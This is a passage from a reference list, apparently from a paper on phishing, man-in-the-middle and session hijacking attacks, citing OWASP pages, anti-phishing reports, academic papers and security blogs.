[6] http://www.roseindia.net/whatis/etoken.shtml

[7] http://www.rsa.com/node.aspx?id=1003

[8] The phishing guide: undrestanding & Preventing Phishing Attacks

By Gunter ollmann
www.ngssoftware.com/papers/nisr-wp-phishing.pdf
[9] Characteristics and Responsibilities involved in a Phishing Attack
Alta van der Merwe, Marianne Loock, Marek Dabrowski
http://portal.acm.org/citation.cfm?id=1071752.1071800

[10] Protecting Users Against Phishing Attacks

Engin Kirda, Christopher Kruegel

[11] Phishing Activity Trends Report

http://www.antiphishing.org/reports/apwg_report_Q4_2009.pdf
www.cs.ucsb.edu/~chris/research/doc/cj06_phish.pdf

[20] Schneier on security, A blog covering security and security technology.

http://www.schneier.com/blog/archives/2008/07/maninthemiddle_1.html

[21] http://en.wikipedia.org/wiki/Man-in-the-middle_attack

[22] The Open Web Application Security Project (OWASP)

http://www.owasp.org/index.php/Man-in-the-middle_attack

[23] http://www.vandyke.com/images/solutions/mitm.gif
[24] The Open Web Application Security Project (OWASP)
http://www.owasp.org/index.php/Session_hijacking_attack

[25] http://www.elitehackers.info/forums/archive/index.php/t-2933.html

[26] Uninett, The Norwegian research network

http://forskningsnett.uninett.no/wlan/wlanthreat.html#08

[27] https://www.info-point-security.com/open_downloads/alt/SessionHijacking.pdf

[28] http://www.elitehackers.info/forums/archive/index.php/t-2933.html

[29] The Open Web Application Security Project (OWASP)

http://www.owasp.org/images/c/cb/Session_Hijacking_3.JPG

[30] Online Identity Theft:Phishing Technology, Chokepoints and Countermeasures

By Aaron Emigh
www.antiphishing.org/Phishing-dhs-report.pdf

[31] How to Avoid the Internet Scam

By Chitwan Kumar Gupta
http://www.associatedcontent.com/article/105088/_how_to_avoid_the_Internet_scam.html

[32] http://phish.kaffenews.com/wp-content/uploads/2010/01/Phish_Discover.png

[33] http://en.wikipedia.org/wiki/Public_key_infrastructure

[34] isc.sans.org/presentations/phishthat.pdf